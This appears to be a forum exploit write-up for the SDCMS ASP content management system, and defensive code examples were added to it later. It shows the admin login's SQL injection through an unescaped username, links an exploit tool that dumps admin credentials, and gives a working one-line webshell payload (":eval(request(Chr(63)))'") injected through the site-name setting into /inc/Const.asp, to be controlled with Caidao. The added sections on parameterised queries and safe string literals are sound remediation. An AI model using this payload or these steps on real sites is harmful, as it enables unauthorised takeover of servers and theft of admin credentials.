Author: T00LS 鬼哥
Vulnerable file: <admin directory>/index.asp
Sub Check
    Dim username,password,code,getcode,Rs
    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":Died
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":Died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":Died
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":Died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":Died
    Else
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            'Automatically delete log records older than 30 days
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub
We can see that username is filtered through FilterText. Let's look at the FilterText code:
Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            t0=Replace(t0,Chr(8),"")  'backspace
            t0=Replace(t0,Chr(9),"")  'tab (horizontal tab)
            t0=Replace(t0,Chr(10),"") 'line feed
            t0=Replace(t0,Chr(11),"") 'vertical tab
            t0=Replace(t0,Chr(12),"") 'form feed
            t0=Replace(t0,Chr(13),"") 'carriage return; chr(13)&chr(10) is the CR+LF pair
            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"") 'space
            t0=Replace(t0,Chr(33),"") '!
            t0=Replace(t0,Chr(34),"") '"
            t0=Replace(t0,Chr(35),"") '#
            t0=Replace(t0,Chr(36),"") '$
            t0=Replace(t0,Chr(37),"") '%
            t0=Replace(t0,Chr(38),"") '&
            t0=Replace(t0,Chr(39),"") ''
            t0=Replace(t0,Chr(40),"") '(
            t0=Replace(t0,Chr(41),"") ')
            t0=Replace(t0,Chr(42),"") '*
            t0=Replace(t0,Chr(43),"") '+
            t0=Replace(t0,Chr(44),"") ',
            t0=Replace(t0,Chr(45),"") '-
            t0=Replace(t0,Chr(46),"") '.
            t0=Replace(t0,Chr(47),"") '/
            t0=Replace(t0,Chr(58),"") ':
            t0=Replace(t0,Chr(59),"") ';
            t0=Replace(t0,Chr(60),"") '<
            t0=Replace(t0,Chr(61),"") '=
            t0=Replace(t0,Chr(62),"") '>
            t0=Replace(t0,Chr(63),"") '?
            t0=Replace(t0,Chr(64),"") '@
            t0=Replace(t0,Chr(91),"") '[
            t0=Replace(t0,Chr(92),"") '\
            t0=Replace(t0,Chr(93),"") ']
            t0=Replace(t0,Chr(94),"") '^
            t0=Replace(t0,Chr(95),"") '_
            t0=Replace(t0,Chr(96),"") '`
            t0=Replace(t0,Chr(123),"") '{
            t0=Replace(t0,Chr(124),"") '|
            t0=Replace(t0,Chr(125),"") '}
            t0=Replace(t0,Chr(126),"") '~
        Case Else
            'HTML-entity encoding (the entities were decoded by the forum when this was pasted)
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
        'a soft hyphen (U+00AD) is inserted after the "e" to break CSS expression()
        t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function
See? When the parameter is 1, all it strips is:

    t0=Replace(t0,Chr(32),"")
    t0=Replace(t0,Chr(13),"")
    t0=Replace(t0,Chr(10)&Chr(10),"")
    t0=Replace(t0,Chr(10),"")

Single quotes are never touched, so username goes into the Select statement unescaped.
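For comparison, here is how the same lookup looks when the user-supplied values are bound as parameters instead of concatenated into the SQL text. This is an added example written for this page, not SDCMS code; it assumes the page's existing globals (an open ADODB.Connection named Conn and the md5() helper) and spells out the ADO constants because adovbs.inc may not be included. The character whitelist on the username is an assumed policy layered on top of parameterisation, not a replacement for it.

```vbscript
' Added example (not SDCMS code): the admin lookup with ADODB.Command parameters.
' Assumes: Conn is an open ADODB.Connection, md5() exists (both from the page).
Const adCmdText = 1
Const adVarChar = 200
Const adParamInput = 1

' Returns a recordset positioned on the matching admin row, or one with Eof=True.
' The caller closes it exactly as the original Check does (Rs.Close / Set Rs=Nothing).
Function FindAdmin(ByVal username, ByVal password)
    Dim cmd, i, ch
    Set FindAdmin = Nothing

    ' Assumed policy: admin names are short and limited to [A-Za-z0-9_].
    ' Reject anything else before it reaches the database at all.
    If Len(username) = 0 Or Len(username) > 20 Then Exit Function
    For i = 1 To Len(username)
        ch = Mid(username, i, 1)
        If InStr("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_", ch) = 0 Then Exit Function
    Next

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = Conn
    cmd.CommandType = adCmdText
    ' "?" placeholders are filled positionally; both the Jet/Access and
    ' SQL Server OLE DB providers used by SDCMS accept this form.
    cmd.CommandText = "Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever " & _
                      "From Sd_Admin Where Sdcms_name=? And Sdcms_Pwd=?"
    cmd.Parameters.Append cmd.CreateParameter("username", adVarChar, adParamInput, 50, username)
    cmd.Parameters.Append cmd.CreateParameter("pwd", adVarChar, adParamInput, 32, md5(password))

    ' A quote in username is now just a character in a bound value,
    ' so the Where clause can never be rewritten by the input.
    Set FindAdmin = cmd.Execute
End Function
```

With this in place the Check routine's Set Rs=Conn.Execute("...") line becomes Set Rs=FindAdmin(username,password) and the rest of its logic is unchanged. Note that this fixes only the injection; the original code also copies the password hash from Rs(2) straight into the sdcms_pwd cookie, which is a separate weakness this example does not address.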
The vulnerability lets you obtain the admin account and password directly. SDCMS's default admin path is /admin/; if the site owner changed the admin path, find it yourself!
Exploit tool download (this tool only runs on XP): sdcms-EXP
Test:

Now enter the captcha shown in the tool, then click OK.

See, we went straight into the admin management interface, heh!

And just like that we are in the backend....
SDCMS privilege escalation:

Method 1: visit /<admin directory>/sdcms_set.asp and append “:eval(request(Chr(63)))’ after the site name (网站名称); that writes a one-line shell straight in. It is written into /inc/Const.asp, and the one-line shell's connection password is ?
OK, now connect to it with 菜刀 (Caidao)!
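The escalation above works because the settings page writes a user-controlled value into an executable include (/inc/Const.asp) without escaping it, so a quote in the value ends the string literal and the rest runs as code. The following is an added example of how such a write should be handled; it is not SDCMS code. It assumes that sdcms_set.asp emits a line of the form Const SiteName="..." (the page only shows the injected result, not the writer), and the file name sitename.txt is a placeholder.

```vbscript
' Added example (not SDCMS code): two ways to stop a settings value from
' becoming code when it is persisted.
' Assumption: the settings page writes  Const SiteName="<value>"  into /inc/Const.asp.

' Option 1: if the value really must be embedded in VBScript source, emit it as a
' proper string literal. VBScript's only escape inside "..." is a doubled quote,
' and CR/LF are stripped so the value cannot start a new statement either.
Function VbStringLiteral(ByVal s)
    s = Replace(s, Chr(13), "")
    s = Replace(s, Chr(10), "")
    VbStringLiteral = """" & Replace(s, """", """""") & """"
End Function

' With the payload from this post the emitted line is
'   Const SiteName=""":eval(request(Chr(63)))'"
' which VBScript parses as one string value; nothing after the quote executes.
Function ConstLine(ByVal name, ByVal value)
    ConstLine = "Const " & name & "=" & VbStringLiteral(value)
End Function

' Option 2 (preferred): keep settings out of code entirely. Store them in a plain
' text file (or a database table) that is read back with FileSystemObject and is
' never passed to Execute/Eval or pulled in with #include.
Sub SaveSiteName(ByVal name)
    Dim fso, f
    Set fso = Server.CreateObject("Scripting.FileSystemObject")
    ' sitename.txt is a placeholder name; keep such files outside the web root where possible.
    Set f = fso.CreateTextFile(Server.MapPath("/inc/sitename.txt"), True)
    f.Write Replace(Replace(name, Chr(13), ""), Chr(10), "")
    f.Close
    Set f = Nothing
    Set fso = Nothing
End Sub
```

Option 2 is the one to prefer: once settings live in data rather than in an include file, there is no literal to break out of, and the admin panel losing a password (as in the first half of this post) no longer gives a route to code execution on the server.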